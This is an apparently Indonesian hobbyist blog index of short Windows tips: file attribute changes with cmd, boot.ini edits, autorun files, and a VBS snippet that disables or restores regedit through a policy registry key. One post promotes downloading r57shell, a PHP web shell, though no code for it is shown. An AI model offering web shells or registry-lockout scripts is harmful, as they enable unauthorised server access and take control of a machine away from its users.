Posted in Script Code by: rizoa
*stop.. nih tulisan bwat yg lom taw aja.. yang udah taw g sah bla bla bla na na na,,, 
pake aja cmd buat ngubah atribut file ato folder yang pengen diubah. matsutna klu pengen ngubah ato ngembaliin file yang dihidden ama virus misalna.. klu dibikin jadi system kan ngga bisa lok lwat propertis. ia.. yang gampang pake aja cmd..
Read the rest of this entry »
Posted in Komputer, Script Code by: rizoa
simpel banget, buat ngilangin boot logo di windows xp. biar ngga nongol lagi tuh logo.. kan kliyatan rada cepet gitu pas booting. padahal kan sama aja. tapi asik juga bgitu ngidupin kompie langsung lyat desktop.,. hehe.. ganti aja file boot.ini di direktory C:\
jadi gini..
[boot loader]
timeout=0
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /fastdetect /NoExecute=OptOut /TUTag=7UFPJH noguiboot
ato ambil aja file boot.ini disini. simpen di C:\ pake attribut system.
Posted in Script Code by: rizoa
simpel banget. ngganti attribut yang dihiden virus misalna. buat ngebalikin attribut yang dibikin jadi system kan ngga bisa lwat properties, lok di windows loh.. sama persis lok kita pake cmd. nih skripna.
misale kita mo bikin file rizoa.exe jadi :
pertama, kita buat file *.bat. pake aja notepad trus kita rename jadi blablabla.bat yang penting namanya jangan attrib.bat Read the rest of this entry »
Posted in Script Code by: rizoa
bikin autorun di drive, atopun di flash disk misalna.. bisa juga buat penangkal virus. lok kita misalna make tuh autorun, trus kita gunain buat ngjalanin program ato aplikasi buat ngehapus file tertentu [virus] misalna. kan bguna banget tuh. scara flash disk kita bisa bebas virus. biarpun ngga 100% ampuh. kan yang penting dah ngurangi.. tul nggak?? nggak!!
Read the rest of this entry »
Posted in Script Code by: rizoa
lok maw donlot script r57shell ada nih disini, ada 2 bahkan… cepetan aja di donlot, kburu abis benwit-na.. hehehehe
script r57shell, script download here now….
Posted in Script Code by: rizoa
1. Disable Registry Tool (regedit)
key : HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
name: Disableregistrytools
type : DWord
data : 1
with vbs :
On Error resume next
CreateObject(”Wscript.shell”).regwrite “HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Policies\System\
disableregistrytools”, 1, “REG_DWORD”
to enable registrytools with vbs:
On Error resume next
CreateObject(”Wscript.shell”).regwrite “HKEY_CURRENT_USER\Software\
Microsoft\Windows\CurrentVersion\Policies\System\
disableregistrytools”, 0, “REG_DWORD”save with *.vbs
Read the rest of this entry »